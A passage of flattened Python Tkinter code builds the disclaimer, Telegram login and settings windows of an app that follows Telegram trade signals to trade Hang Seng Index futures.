tk.Checkbutton(disclaimer_form, text="本人明白及同意以上聲明", anchor=tk.W, font=content_font, var=agree_var1, command=agree_checkbox_on_change) agree_checkbox1.pack() agree_checkbox1.place(x=UI.Disclaimer.AGREE_CHECKBOX1_X, y=UI.Disclaimer.AGREE_CHECKBOX1_Y) agree_var2 = tk.BooleanVar() agree_checkbox2 = tk.Checkbutton(disclaimer_form, text="本人授權該軟件收取Telegram訊息及連接證券交易服務提供者進行交易", anchor=tk.W, font=content_font, var=agree_var2, command=agree_checkbox_on_change) agree_checkbox2.pack() agree_checkbox2.place(x=UI.Disclaimer.AGREE_CHECKBOX2_X, y=UI.Disclaimer.AGREE_CHECKBOX2_Y) confirm_button = tk.Button(disclaimer_form, text="確定", font=content_font, command=self.agree_disclaimer, state=tk.DISABLED) confirm_button.pack() confirm_button.place(height=UI.Disclaimer.CONFIRM_BUTTON_HEIGHT, width=UI.Disclaimer.CONFIRM_BUTTON_WIDTH, x=UI.Disclaimer.CONFIRM_BUTTON_X, y=UI.Disclaimer.CONFIRM_BUTTON_Y) cancel_button = tk.Button(disclaimer_form, text="取消", font=content_font, command=self.quit_app) cancel_button.pack() cancel_button.place(height=UI.Disclaimer.CANCEL_BUTTON_HEIGHT, width=UI.Disclaimer.CANCEL_BUTTON_WIDTH, x=UI.Disclaimer.CANCEL_BUTTON_X, y=UI.Disclaimer.CANCEL_BUTTON_Y) disclaimer_form.protocol("WM_DELETE_WINDOW", self.quit_app) self.disclaimer_form = disclaimer_form def load_login_form_gui(self): login_form = self.app login_form.resizable(False, False) screenwidth = login_form.winfo_screenwidth() screenheight = login_form.winfo_screenheight() width = UI.LoginForm.WIDTH height = UI.LoginForm.HEIGHT login_form.geometry('%dx%d+%d+%d' % (width, height, (screenwidth / 2) - (width / 2), (screenheight / 2) - (height / 2))) login_form.title(self.app_title) label_width = UI.LoginForm.LABEL_WIDTH input_width = UI.LoginForm.INPUT_WIDTH self.api_id_label = tk.Label(login_form, text="API ID", anchor=tk.W, width=label_width) self.api_id_label.grid(row=0, column=0, padx=(UI.LoginForm.PADDING, 0)) self.api_id_var = tk.StringVar() self.api_id_entry = tk.Entry(login_form, textvariable=self.api_id_var, width=input_width) self.api_id_entry.grid(row=0, column=1, padx=(0, UI.LoginForm.PADDING)) self.api_hash_label = tk.Label(login_form, text="API Hash", anchor=tk.W, width=label_width) self.api_hash_label.grid(row=1, column=0, padx=(UI.LoginForm.PADDING, 0)) self.api_hash_entry = tk.StringVar() self.api_hash_entry = tk.Entry(login_form, textvariable=self.api_hash_entry, width=input_width) self.api_hash_entry.grid(row=1, column=1, padx=(0, UI.LoginForm.PADDING)) self.phone_number_label = tk.Label(login_form, text="電話號碼", anchor=tk.W, width=label_width) self.phone_number_label.grid(row=2, column=0, padx=(UI.LoginForm.PADDING, 0)) self.phone_number_var = tk.StringVar() self.phone_number_entry = tk.Entry(login_form, textvariable=self.phone_number_var, width=input_width) self.phone_number_entry.grid(row=2, column=1, padx=(0, UI.LoginForm.PADDING)) self.login_button = tk.Button(login_form, text="登入", command=lambda: self.run_async_task(self.login)) self.login_button.grid(row=3, column=1, sticky=tk.E, padx=(0, UI.LoginForm.LOGIN_BUTTON_PADDING_X), pady=UI.LoginForm.LOGIN_BUTTON_PADDING_Y) self.app = login_form def load_login_form_config(self): if constants.SAVE_TELEGRAM_LOGIN_INFORMATION: api_id = self.config.get_telegram_setting("api_id") api_hash = self.config.get_telegram_setting("api_hash") phone_number = self.config.get_telegram_setting("phone_number") if api_id is not None and api_id != "": self.api_id_entry.insert(tk.END, api_id) if api_hash is not None and api_hash != "": self.api_hash_entry.insert(tk.END, api_hash) if phone_number is not None and phone_number != "": self.phone_number_entry.insert(tk.END, phone_number) async def login(self): pass async def get_verification_code(self): pass def remove_login_form_gui(self): self.api_id_label.grid_remove() self.api_id_entry.grid_remove() self.api_hash_label.grid_remove() self.api_hash_entry.grid_remove() self.phone_number_label.grid_remove() self.phone_number_entry.grid_remove() self.login_button.grid_remove() def load_trade_app_gui(self): trade_app = self.app trade_app.title(self.app_title) self.remove_login_form_gui() screenwidth = trade_app.winfo_screenwidth() screenheight = trade_app.winfo_screenheight() width = UI.Main.WIDTH height = UI.Main.HEIGHT padding = UI.Main.PADDING frame_padding_x = UI.Main.FRAME_PADDING_X frame_padding_y = UI.Main.FRAME_PADDING_Y frame_width = width - (frame_padding_x * 2) trade_app.geometry('%dx%d+%d+%d' % (width, height, (screenwidth / 2) - (width / 2), (screenheight / 2) - (height / 2))) trade_app.resizable(False, False) self.label_frame_font_style = tk.font.Font(size=UI.Main.FRAME_FONT_SIZE) self.label_font_style = tk.font.Font(size=UI.Main.CONTENT_FONT_SIZE) self.label_width = UI.Main.LABEL_WIDTH self.input_width = UI.Main.INPUT_WIDTH self.setting_trade_app_frame = tk.Frame(trade_app, width=width, height=UI.Main.SETTING_FRAME_HEIGHT) self.console_trade_app_frame = tk.Frame(trade_app, width=width, height=UI.Main.CONSOLE_FRAME_HEIGHT) self.remark_trade_app_frame = tk.Frame(trade_app, width=width, bg="yellow", height=UI.Main.REMARK_FRAME_HEIGHT) self.dialog_frame = tk.LabelFrame(self.setting_trade_app_frame, text='頻道設定', font=self.label_frame_font_style, width=frame_width, height=UI.Main.DIALOG_FRAME_HEIGHT, padx=frame_padding_x, pady=frame_padding_y) self.dialog_frame.grid_propagate(False) self.dialog_frame.grid(row=0, padx=frame_padding_x, pady=frame_padding_y) tk.Label(self.dialog_frame, text="選擇頻道", font=self.label_font_style, width=self.label_width, anchor=tk.W) \ .grid(row=0, column=0, padx=0, pady=(padding, 0), sticky=tk.W) self.dialog_select_frame = tk.Frame(self.dialog_frame) self.dialog_select_frame.grid(row=0, column=1, columnspan=4, sticky=tk.W) self.dialog_select = ttk.Combobox(self.dialog_select_frame, state="readonly", width=UI.Main.DIALOG_SELECT_WIDTH) self.dialog_select.grid(row=0, column=0, sticky=tk.W, pady=padding) self.dialog_select.bind("<<ComboboxSelected>>", self.dialog_select_on_select) self.dialog_update_button = tk.Button(self.dialog_select_frame, text="刷新", font=self.label_font_style, command=lambda: self.run_async_task(self.refresh_dialog_list)) self.dialog_update_button.grid(row=0, column=1, sticky=tk.W, padx=padding, pady=padding) self.dialog_test_button = tk.Button(self.dialog_select_frame, text="測試", font=self.label_font_style, command=lambda: self.run_async_task(self.test_dialog_setting), state=tk.DISABLED) self.dialog_test_button.grid(row=0, column=2, sticky=tk.NE, padx=(0, padding), pady=padding) self.dialog_save_setting_button = tk.Button(self.dialog_select_frame, text="儲存訊息設定", font=self.label_font_style, command=self.save_dialog_setting, state=tk.DISABLED) self.dialog_save_setting_button.grid(row=0, column=3, sticky=tk.NE, padx=(0, UI.Main.DIALOG_SAVE_SETTING_BUTTON_PADDING_X), pady=UI.Main.DIALOG_SAVE_SETTING_BUTTON_PADDING_Y) tk.Label(self.dialog_frame, text="建好倉訊息", font=self.label_font_style, width=self.label_width, anchor=tk.W) \ .grid(row=1, column=0, padx=0, pady=(0, padding), sticky=tk.W) self.open_buy_template_var = tk.StringVar() self.open_buy_template_entry = tk.Entry(self.dialog_frame, textvariable=self.open_buy_template_var, width=self.input_width, state=tk.DISABLED) self.open_buy_template_entry.grid(row=1, column=1, sticky=tk.W, padx=(0, UI.Main.DIALOG_INPUT_PADDING_X), pady=(0, padding)) tk.Label(self.dialog_frame, text="平好倉訊息", font=self.label_font_style, width=self.label_width, anchor=tk.W) \ .grid(row=1, column=2, padx=0, pady=(0, padding), sticky=tk.W) self.close_buy_template_var = tk.StringVar() self.close_buy_template_entry = tk.Entry(self.dialog_frame, textvariable=self.close_buy_template_var, width=self.input_width, state=tk.DISABLED) self.close_buy_template_entry.grid(row=1, column=3, sticky=tk.W, padx=(0, UI.Main.DIALOG_INPUT_RIGHT_PADDING_X), pady=(0, padding)) tk.Label(self.dialog_frame, text="建淡倉訊息", font=self.label_font_style, width=self.label_width, anchor=tk.W) \ .grid(row=2, column=0, padx=0, pady=(0, padding), sticky=tk.W) self.open_sell_template_var = tk.StringVar() self.open_sell_template_entry = tk.Entry(self.dialog_frame, textvariable=self.open_sell_template_var, width=self.input_width, state=tk.DISABLED) self.open_sell_template_entry.grid(row=2, column=1, sticky=tk.W, padx=(0, UI.Main.DIALOG_INPUT_PADDING_X), pady=(0, padding)) tk.Label(self.dialog_frame, text="平淡倉訊息", font=self.label_font_style, width=self.label_width, anchor=tk.W) \ .grid(row=2, column=2, padx=0, pady=(0, padding)) self.close_sell_template_var = tk.StringVar() self.close_sell_template_entry = tk.Entry(self.dialog_frame, textvariable=self.close_sell_template_var, width=self.input_width, state=tk.DISABLED) self.close_sell_template_entry.grid(row=2, column=3, sticky=tk.W, padx=(0, UI.Main.DIALOG_INPUT_RIGHT_PADDING_X), pady=(0, padding)) tk.Label(self.dialog_frame, text="時間格式", font=self.label_font_style, width=self.label_width, anchor=tk.W) \ .grid(row=3, column=0, padx=0, pady=(0, padding), sticky=tk.W) self.time_format_var = tk.StringVar() self.time_format_entry = tk.Entry(self.dialog_frame, textvariable=self.time_format_var, width=self.input_width, state=tk.DISABLED) self.time_format_entry.grid(row=3, column=1, sticky=tk.W, padx=(0, UI.Main.DIALOG_INPUT_PADDING_X), pady=UI.Main.TIME_FORMAT_INPUT_PADDING_Y) self.trade_account_frame = tk.LabelFrame(self.setting_trade_app_frame, text='交易帳戶', font=self.label_frame_font_style, width=frame_width, height=UI.Main.TRADE_ACCOUNT_FRAME_HEIGHT, padx=frame_padding_x, pady=frame_padding_y) self.trade_account_frame.grid_propagate(False) self.trade_account_frame.grid(row=1, padx=frame_padding_x, pady=0) tk.Label(self.trade_account_frame, text="交易密碼", font=self.label_font_style, width=UI.Main.TRADE_PASSWORD_LABEL_WIDTH, anchor=tk.W) \ .grid(row=0, column=0, padx=0, pady=(0, 0), sticky=tk.W) self.trade_password_entry = tk.Entry(self.trade_account_frame, textvariable=tk.StringVar(), width=UI.Main.TRADE_PASSWORD_INPUT_WIDTH, show="*") self.trade_password_entry.grid(row=0, column=1, padx=UI.Main.TRADE_PASSWORD_INPUT_PADDING_X, pady=0, sticky=tk.W) tk.Label(self.trade_account_frame, text="端口(0-65535)", font=self.label_font_style, width=UI.Main.TRADE_PORT_INPUT_WIDTH, anchor=tk.E) \ .grid(row=0, column=2, padx=(padding, 0), pady=0) self.trade_port_var = tk.StringVar() self.trade_port_var.trace(tk.W, lambda name, index, mode, sv=self.trade_port_var: self.trade_port_entry_on_change(sv)) self.trade_port_entry = tk.Entry(self.trade_account_frame, textvariable=self.trade_port_var, width=6) self.trade_port_entry.grid(row=0, column=3, padx=UI.Main.TRADE_PORT_INPUT_PADDING_X, pady=0) self.trade_password_test_button = tk.Button(self.trade_account_frame, text="測試", font=self.label_font_style, command=lambda: self.run_async_task( self.test_trade_account_setting)) self.trade_password_test_button.grid(row=0, column=4, sticky=tk.NE, padx=(0, UI.Main.TRADE_PASSWORD_TEST_BUTTON_PADDING_X), pady=UI.Main.TRADE_PASSWORD_TEST_BUTTON_PADDING_Y) trade_setting_frame_height = UI.Main.TRADE_SETTING_FRAME_HEIGHT self.trade_setting_frame = tk.LabelFrame(self.setting_trade_app_frame, text='交易設定', font=self.label_frame_font_style, width=frame_width, height=trade_setting_frame_height) self.trade_setting_frame.grid_propagate(False) self.trade_setting_frame.grid(row=2, padx=frame_padding_x, pady=frame_padding_y) self.trade_setting_frame_1 = tk.Frame(self.trade_setting_frame, width=UI.Main.TRADE_SETTING_FRAME_1_WIDTH, height=trade_setting_frame_height - 20, padx=frame_padding_x, pady=frame_padding_y) self.trade_setting_frame_1.grid(row=0, column=0, sticky=tk.N) self.trade_setting_frame_1.grid_propagate(False) self.trade_mode_frame = tk.Frame(self.trade_setting_frame_1) self.trade_mode_frame.grid(row=0, column=0, sticky=tk.W) tk.Label(self.trade_mode_frame, text="交易模式", font=self.label_font_style, width=UI.Main.TRADE_MODE_LABEL_WIDTH, anchor=tk.W) \ .grid(row=0, column=0, padx=0, pady=UI.Main.TRADE_MODE_LABEL_PADDING_Y, sticky=tk.W) self.trade_mode_var = tk.StringVar() self.trade_mode_var.set(constants.TradeMode.FIXED_QUANTITY) self.trade_mode_fixed_quantity = tk.Radiobutton(self.trade_mode_frame, text="固定數量", font=self.label_font_style, variable=self.trade_mode_var, value=constants.TradeMode.FIXED_QUANTITY, command=self.trade_mode_checkbox_on_change) self.trade_mode_max_quantity = tk.Radiobutton(self.trade_mode_frame, text="自動檢測最大可買數量", font=self.label_font_style, variable=self.trade_mode_var, value=constants.TradeMode.MAX_QUANTITY, command=self.trade_mode_checkbox_on_change) self.trade_mode_fixed_quantity.grid(row=0, column=1, pady=UI.Main.TRADE_MODE_CHECKBOX_PADDING_Y, sticky=tk.W) self.trade_mode_max_quantity.grid(row=0, column=2, pady=UI.Main.TRADE_MODE_CHECKBOX_PADDING_Y, sticky=tk.W) self.trade_product_frame = tk.Frame(self.trade_setting_frame_1) self.trade_product_frame.grid(row=1, column=0, sticky=tk.W) tk.Label(self.trade_product_frame, text="交易產品", font=self.label_font_style, width=UI.Main.TRADE_PRODUCT_LABEL_WIDTH, anchor=tk.W) \ .grid(row=0, column=0, padx=UI.Main.TRADE_PRODUCT_LABEL_PADDING_X, pady=UI.Main.TRADE_PRODUCT_LABEL_PADDING_Y, sticky=tk.W) self.trade_product_hsi_var = tk.BooleanVar() self.trade_product_mhi_var = tk.BooleanVar() self.trade_product_hsi = tk.Checkbutton(self.trade_product_frame, text="恆生指數期貨", font=self.label_font_style, var=self.trade_product_hsi_var, command=self.trade_product_checkbox_on_change) self.trade_product_mhi = tk.Checkbutton(self.trade_product_frame, text="小型恆生指數期貨", font=self.label_font_style, var=self.trade_product_mhi_var, command=self.trade_product_checkbox_on_change) self.trade_product_hsi.grid(row=0, column=1, pady=UI.Main.TRADE_PRODUCT_CHECKBOX_PADDING_Y, sticky=tk.W) self.trade_product_mhi.grid(row=0, column=2, pady=UI.Main.TRADE_PRODUCT_CHECKBOX_PADDING_Y, sticky=tk.W) self.trade_quantity_frame = tk.Frame(self.trade_setting_frame_1) self.trade_quantity_frame.grid(row=2, column=0, sticky=tk.W) tk.Label(self.trade_quantity_frame, text="期貨交易數量", font=self.label_font_style, width=UI.Main.HSI_TRADE_QUANTITY_LABEL_WIDTH, anchor=tk.W) \ .grid(row=0, column=0, padx=UI.Main.TRADE_QUANTITY_LABEL_PADDING_X, pady=UI.Main.TRADE_QUANTITY_LABEL_PADDING_Y, sticky=tk.W) self.hsi_trade_quantity_var = tk.StringVar() self.hsi_trade_quantity_var.trace(tk.W, lambda name, index, mode, sv=self.hsi_trade_quantity_var: self.trade_setting_entry_on_change(sv, "hsi_trade_quantity", constants.TkinterEntryType.POSITIVE_INTEGER)) self.hsi_trade_quantity_entry = tk.Entry(self.trade_quantity_frame, textvariable=self.hsi_trade_quantity_var, width=UI.Main.TRADE_QUANTITY_INPUT_WIDTH, justify='center') self.hsi_trade_quantity_entry.bind('<Control-v>', lambda e: 'break') self.hsi_trade_quantity_entry.grid(row=0, column=1, padx=UI.Main.TRADE_QUANTITY_INPUT_PADDING_X, pady=UI.Main.TRADE_QUANTITY_LABEL_PADDING_Y) tk.Label(self.trade_quantity_frame, text="小型期貨交易數量", font=self.label_font_style, width=UI.Main.MHI_TRADE_QUANTITY_LABEL_WIDTH, anchor=tk.W) \ .grid(row=0, column=2, padx=UI.Main.TRADE_QUANTITY_LABEL_PADDING_X, pady=UI.Main.TRADE_QUANTITY_LABEL_PADDING_Y) self.mhi_trade_quantity_var = tk.StringVar() self.mhi_trade_quantity_var.trace(tk.W, lambda name, index, mode, sv=self.mhi_trade_quantity_var: self.trade_setting_entry_on_change(sv, "mhi_trade_quantity", constants.TkinterEntryType.POSITIVE_INTEGER)) self.mhi_trade_quantity_entry = tk.Entry(self.trade_quantity_frame, textvariable=self.mhi_trade_quantity_var, width=UI.Main.TRADE_QUANTITY_INPUT_WIDTH, justify='center') self.mhi_trade_quantity_entry.bind('<Control-v>', lambda e: 'break') self.mhi_trade_quantity_entry.grid(row=0, column=3, padx=UI.Main.TRADE_QUANTITY_INPUT_PADDING_X, pady=UI.Main.TRADE_QUANTITY_INPUT_PADDING_Y) self.hsi_margin_frame = tk.Frame(self.trade_setting_frame_1) self.hsi_margin_frame.grid(row=3, column=0, sticky=tk.W) tk.Label(self.hsi_margin_frame, text="每達保證金", font=self.label_font_style, width=UI.Main.MARGIN_LABEL_WIDTH, anchor=tk.W) \ .grid(row=3, column=0, padx=UI.Main.MARGIN_LABEL_PADDING_X, pady=UI.Main.MARGIN_LABEL_PADDING_Y, sticky=tk.W) self.hsi_margin_var = tk.StringVar() self.hsi_margin_var.trace(tk.W, lambda name, index, mode, sv=self.hsi_margin_var: self.trade_setting_entry_on_change(sv, "hsi_margin", constants.TkinterEntryType.POSITIVE_INTEGER)) self.hsi_margin_entry = tk.Entry(self.hsi_margin_frame, textvariable=self.hsi_margin_var, width=UI.Main.MARGIN_INPUT_WIDTH, justify='center') self.hsi_margin_entry.bind('<Control-v>', lambda e: 'break') self.hsi_margin_entry.grid(row=3, column=1, padx=UI.Main.MARGIN_INPUT_PADDING_X, pady=UI.Main.MARGIN_INPUT_PADDING_Y) tk.Label(self.hsi_margin_frame, text="交易期貨一張", font=self.label_font_style, width=UI.Main.HSI_MARGIN_LABEL_WIDTH, anchor=tk.W) \ .grid(row=3, column=2, padx=(0, 0), pady=UI.Main.MARGIN_LABEL_PADDING_Y) self.mhi_margin_frame = tk.Frame(self.trade_setting_frame_1) self.mhi_margin_frame.grid(row=4, column=0, sticky=tk.W) tk.Label(self.mhi_margin_frame, text="每達保證金", font=self.label_font_style, width=UI.Main.MARGIN_LABEL_WIDTH, anchor=tk.W) \ .grid(row=3, column=0, padx=UI.Main.MARGIN_LABEL_PADDING_X, pady=UI.Main.MARGIN_LABEL_PADDING_Y) self.mhi_margin_var = tk.StringVar() self.mhi_margin_var.trace(tk.W, lambda name, index, mode, sv=self.mhi_margin_var: self.trade_setting_entry_on_change(sv, "mhi_margin", constants.TkinterEntryType.POSITIVE_INTEGER)) self.mhi_margin_entry = tk.Entry(self.mhi_margin_frame, textvariable=self.mhi_margin_var, width=UI.Main.MARGIN_INPUT_WIDTH, justify='center') self.mhi_margin_entry.bind('<Control-v>', lambda e: 'break') self.mhi_margin_entry.grid(row=3, column=1, padx=UI.Main.MARGIN_INPUT_PADDING_X, pady=UI.Main.MARGIN_INPUT_PADDING_Y) tk.Label(self.mhi_margin_frame, text="交易小型期貨一張", font=self.label_font_style, width=UI.Main.MHI_MARGIN_LABEL_WIDTH, anchor=tk.W) \ .grid(row=3, column=2, padx=(0, 0), pady=UI.Main.MARGIN_LABEL_PADDING_Y) self.trade_setting_frame_2 = tk.Frame(self.trade_setting_frame, width=UI.Main.TRADE_SETTING_FRAME_2_WIDTH, height=trade_setting_frame_height - 20, padx=frame_padding_x, pady=frame_padding_y) self.trade_setting_frame_2.grid(row=0, column=1, sticky=tk.N) self.trade_setting_frame_2.grid_propagate(False) self.trade_period_frame = tk.Frame(self.trade_setting_frame_2) self.trade_period_frame.grid(row=0, column=0, sticky=tk.NW) tk.Label(self.trade_period_frame, text="交易時段", font=self.label_font_style, width=UI.Main.TRADE_PERIOD_LABEL_WIDTH, anchor=tk.W) \ .grid(row=0, column=0, padx=UI.Main.TRADE_PERIOD_LABEL_PADDING_X, pady=UI.Main.TRADE_PERIOD_LABEL_PADDING_Y) self.trade_period_morning_var = tk.BooleanVar() self.trade_period_afternoon_var = tk.BooleanVar() self.trade_period_night_var = tk.BooleanVar() self.trade_period_morning = tk.Checkbutton(self.trade_period_frame, text="上午", font=self.label_font_style, var=self.trade_period_morning_var, command=partial(self.trade_setting_checkbox_on_change, self.trade_period_morning_var, "trade_period_morning")) self.trade_period_afternoon = tk.Checkbutton(self.trade_period_frame, text="下午", font=self.label_font_style, var=self.trade_period_afternoon_var, command=partial(self.trade_setting_checkbox_on_change, self.trade_period_afternoon_var, "trade_period_afternoon")) self.trade_period_night = tk.Checkbutton(self.trade_period_frame, text="晚上", font=self.label_font_style, var=self.trade_period_night_var, command=partial(self.trade_setting_checkbox_on_change, self.trade_period_night_var, "trade_period_night")) self.trade_period_morning.grid(row=0, column=1, pady=UI.Main.TRADE_PERIOD_CHECKBOX_PADDING_Y, sticky=tk.W) self.trade_period_afternoon.grid(row=0, column=2, pady=UI.Main.TRADE_PERIOD_CHECKBOX_PADDING_Y, sticky=tk.W) self.trade_period_night.grid(row=0, column=3, pady=UI.Main.TRADE_PERIOD_CHECKBOX_PADDING_Y, sticky=tk.W) self.open_extra_price_frame = tk.Frame(self.trade_setting_frame_2) self.open_extra_price_frame.grid(row=1, column=0, sticky=tk.W) tk.Label(self.open_extra_price_frame, text="建倉追價", font=self.label_font_style, width=UI.Main.OPEN_EXTRA_PRICE_LABEL_WIDTH, anchor=tk.W) \ .grid(row=0, column=0, padx=UI.Main.OPEN_EXTRA_PRICE_LABEL_PADDING_X, pady=UI.Main.OPEN_EXTRA_PRICE_LABEL_PADDING_Y) self.open_extra_price_var = tk.StringVar() self.open_extra_price_var.trace(tk.W, lambda name, index, mode, sv=self.open_extra_price_var: self.trade_setting_entry_on_change(sv, "open_extra_price", constants.TkinterEntryType.INTEGER)) self.open_extra_price_entry = tk.Entry(self.open_extra_price_frame, textvariable=self.open_extra_price_var, width=UI.Main.OPEN_EXTRA_PRICE_INPUT_WIDTH, justify='center') self.open_extra_price_entry.bind('<Control-v>', lambda e: 'break') self.open_extra_price_entry.grid(row=0, column=1, padx=UI.Main.OPEN_EXTRA_PRICE_INPUT_PADDING_X, pady=UI.Main.OPEN_EXTRA_PRICE_INPUT_PADDING_Y) self.close_price_adjust_interval_frame = tk.Frame(self.trade_setting_frame_2) self.close_price_adjust_interval_frame.grid(row=2, column=0, sticky=tk.W) tk.Label(self.close_price_adjust_interval_frame, text="平倉調整價格區間", font=self.label_font_style, width=UI.Main.CLOSE_PRICE_ADJUST_INTERVAL_LABEL_WIDTH, anchor=tk.W) \ .grid(row=0, column=0, padx=UI.Main.CLOSE_PRICE_ADJUST_INTERVAL_LABEL_PADDING_X, pady=UI.Main.CLOSE_PRICE_ADJUST_INTERVAL_LABEL_PADDING_Y) self.close_price_adjust_interval_var = tk.StringVar() self.close_price_adjust_interval_var.trace(tk.W, lambda name, index, mode, sv=self.close_price_adjust_interval_var: self.trade_setting_entry_on_change(sv, "close_price_adjust_interval", constants.TkinterEntryType.POSITIVE_INTEGER)) self.close_price_adjust_interval_entry = tk.Entry(self.close_price_adjust_interval_frame, textvariable=self.close_price_adjust_interval_var, width=UI.Main.CLOSE_PRICE_ADJUST_INTERVAL_INPUT_WIDTH, justify='center') self.close_price_adjust_interval_entry.bind('<Control-v>', lambda e: 'break') self.close_price_adjust_interval_entry.grid(row=0, column=1, padx=UI.Main.CLOSE_PRICE_ADJUST_INTERVAL_INPUT_PADDING_X, pady=UI.Main.CLOSE_PRICE_ADJUST_INTERVAL_INPUT_PADDING_Y) self.cancel_unfulfilled_order_after_second_frame = tk.Frame(self.trade_setting_frame_2) self.cancel_unfulfilled_order_after_second_frame.grid(row=3, column=0, sticky=tk.W) tk.Label(self.cancel_unfulfilled_order_after_second_frame, text="等待", font=self.label_font_style, width=UI.Main.CANCEL_UNFULFILLED_ORDER_AFTER_SECOND_LABEL_1_WIDTH, anchor=tk.W) \ .grid(row=0, column=0, padx=UI.Main.CANCEL_UNFULFILLED_ORDER_AFTER_SECOND_LABEL_PADDING_X, pady=UI.Main.CANCEL_UNFULFILLED_ORDER_AFTER_SECOND_LABEL_PADDING_Y) self.cancel_unfulfilled_order_after_second_var = tk.StringVar() self.cancel_unfulfilled_order_after_second_var.trace(tk.W, lambda name, index, mode, sv=self.cancel_unfulfilled_order_after_second_var: self.trade_setting_entry_on_change(sv, "cancel_unfulfilled_order_after_second", constants.TkinterEntryType.FLOAT)) self.cancel_unfulfilled_order_after_second_entry = \ tk.Entry(self.cancel_unfulfilled_order_after_second_frame, textvariable=self.cancel_unfulfilled_order_after_second_var, width=UI.Main.CANCEL_UNFULFILLED_ORDER_AFTER_SECOND_INPUT_WIDTH, justify='center') self.cancel_unfulfilled_order_after_second_entry \ .grid(row=0, column=1, padx=UI.Main.CANCEL_UNFULFILLED_ORDER_AFTER_SECOND_INPUT_PADDING_X, pady=UI.Main.CANCEL_UNFULFILLED_ORDER_AFTER_SECOND_INPUT_PADDING_Y, sticky=tk.E) self.cancel_unfulfilled_order_after_second_entry.bind('<Control-v>', lambda e: 'break') tk.Label(self.cancel_unfulfilled_order_after_second_frame, text="秒後取消未成交的建倉訂單", font=self.label_font_style, width=UI.Main.CANCEL_UNFULFILLED_ORDER_AFTER_SECOND_LABEL_2_WIDTH, anchor=tk.W) \ .grid(row=0, column=2, padx=UI.Main.CANCEL_UNFULFILLED_ORDER_AFTER_SECOND_LABEL_PADDING_X , pady=UI.Main.CANCEL_UNFULFILLED_ORDER_AFTER_SECOND_LABEL_PADDING_Y) self.trade_only_within_second_frame = tk.Frame(self.trade_setting_frame_2) self.trade_only_within_second_frame.grid(row=4, column=0, sticky=tk.W) tk.Label(self.trade_only_within_second_frame, text="忽略延誤", font=self.label_font_style, width=UI.Main.TRADE_ONLY_WITHIN_SECOND_LABEL_1_WIDTH, anchor=tk.W) \ .grid(row=0, column=0, padx=UI.Main.TRADE_ONLY_WITHIN_SECOND_LABEL_PADDING_X, pady=UI.Main.TRADE_ONLY_WITHIN_SECOND_LABEL_PADDING_Y) self.trade_only_within_second_var = tk.StringVar() self.trade_only_within_second_var.trace(tk.W, lambda name, index, mode, sv=self.trade_only_within_second_var: self.trade_setting_entry_on_change(sv, "trade_only_within_second", constants.TkinterEntryType.FLOAT)) self.trade_only_within_second_entry = tk.Entry(self.trade_only_within_second_frame, textvariable=self.trade_only_within_second_var, width=UI.Main.TRADE_ONLY_WITHIN_SECOND_INPUT_WIDTH, justify='center') self.trade_only_within_second_entry.bind('<Control-v>', lambda e: 'break') self.trade_only_within_second_entry.grid(row=0, column=1, padx=UI.Main.TRADE_ONLY_WITHIN_SECOND_INPUT_PADDING_X, pady=UI.Main.TRADE_ONLY_WITHIN_SECOND_INPUT_PADDING_Y, sticky=tk.E) tk.Label(self.trade_only_within_second_frame, text="秒以上的交易訊息", font=self.label_font_style, width=UI.Main.TRADE_ONLY_WITHIN_SECOND_LABEL_2_WIDTH, anchor=tk.W) \ .grid(row=0, column=2, padx=UI.Main.TRADE_ONLY_WITHIN_SECOND_LABEL_PADDING_X, pady=UI.Main.TRADE_ONLY_WITHIN_SECOND_LABEL_PADDING_Y) self.trade_setting_frame_3 = tk.Frame(self.trade_setting_frame, width=UI.Main.TRADE_SETTING_FRAME_3_WIDTH, height=trade_setting_frame_height - 20, padx=0, pady=frame_padding_y) self.trade_setting_frame_3.grid(row=0, column=2, sticky=tk.NE) self.trade_setting_frame_3.grid_propagate(False) self.trade_setting_frame_3.grid_rowconfigure(0, weight=1) self.trade_setting_frame_3.grid_columnconfigure(0, weight=1) self.manual_confirm_trade_message_var = tk.BooleanVar() self.manual_confirm_trade_message = tk.Checkbutton(self.trade_setting_frame_3, text="手動確認每筆交易", font=self.label_font_style, var=self.manual_confirm_trade_message_var, command=partial(self.trade_setting_checkbox_on_change, self.manual_confirm_trade_message_var, "manual_confirm_trade_message")) self.manual_confirm_trade_message.grid(row=0, column=0, pady=UI.Main.MANUAL_CONFIRM_TRADE_MESSAGE_CHECKBOX_PADDING_Y, sticky=tk.NE) self.start_button_font_style = tk.font.Font(size=UI.Main.START_BUTTON_FONT_SIZE) self.start_follow_trade_button = tk.Button(self.trade_setting_frame_3, text="開始", font=self.start_button_font_style, command=lambda: self.run_async_task(self.start_follow_trade)) self.start_follow_trade_button.grid(row=1, column=0, sticky=tk.NE, padx=UI.Main.START_BUTTON_PADDING_X, pady=UI.Main.START_BUTTON_PADDING_Y) self.setting_trade_app_frame.grid(row=0) self.console_trade_app_frame.grid(row=1) self.remark_trade_app_frame.grid(row=2, sticky=tk.E, padx=frame_padding_x) scrollbar = tk.Scrollbar(self.console_trade_app_frame) console_text_font = tk.font.Font(size=UI.Main.CONSOLE_TEXT_FONT_SIZE) console_text_font_bold = tk.font.Font(size=UI.Main.CONSOLE_TEXT_FONT_SIZE, name="bold") console_text_font_bold.configure(weight="bold") self.console_text = tk.Text(self.console_trade_app_frame, width=UI.Main.CONSOLE_TEXT_WIDTH, height=UI.Main.CONSOLE_TEXT_HEIGHT, wrap="word", bg=constants.Color.DARK, fg=constants.Color.TEXT, yscrollcommand=scrollbar.set, borderwidth=0, highlightthickness=0, font=console_text_font, selectbackground=constants.Color.CONSTRAST, state=tk.DISABLED) scrollbar.config(command=self.console_text.yview) scrollbar.pack(side=tk.RIGHT, fill=tk.Y) self.console_text.pack(side=tk.LEFT, fill=tk.BOTH, expand=True) self.console_text.tag_config(constants.TkinterTextColorTag.LogTime.TITLE, foreground=constants.TkinterTextColorTag.LogTime.FG_COLOR) self.console_text.tag_config(constants.TkinterTextColorTag.Success.TITLE, background=constants.TkinterTextColorTag.Success.BG_COLOR) self.console_text.tag_config(constants.TkinterTextColorTag.Warning.TITLE, background=constants.TkinterTextColorTag.Warning.BG_COLOR) self.console_text.tag_config(constants.TkinterTextColorTag.Error.TITLE, background=constants.TkinterTextColorTag.Error.BG_COLOR) self.console_text.tag_config(constants.TkinterTextColorTag.Info.TITLE, background=constants.TkinterTextColorTag.Info.BG_COLOR) self.console_text.tag_config(constants.TkinterTextColorTag.Sharp.TITLE, foreground=constants.TkinterTextColorTag.Sharp.FG_COLOR) self.console_trade_app_frame.grid(row=1) self.clear_console_button = tk.Button(self.console_trade_app_frame, text="清除", 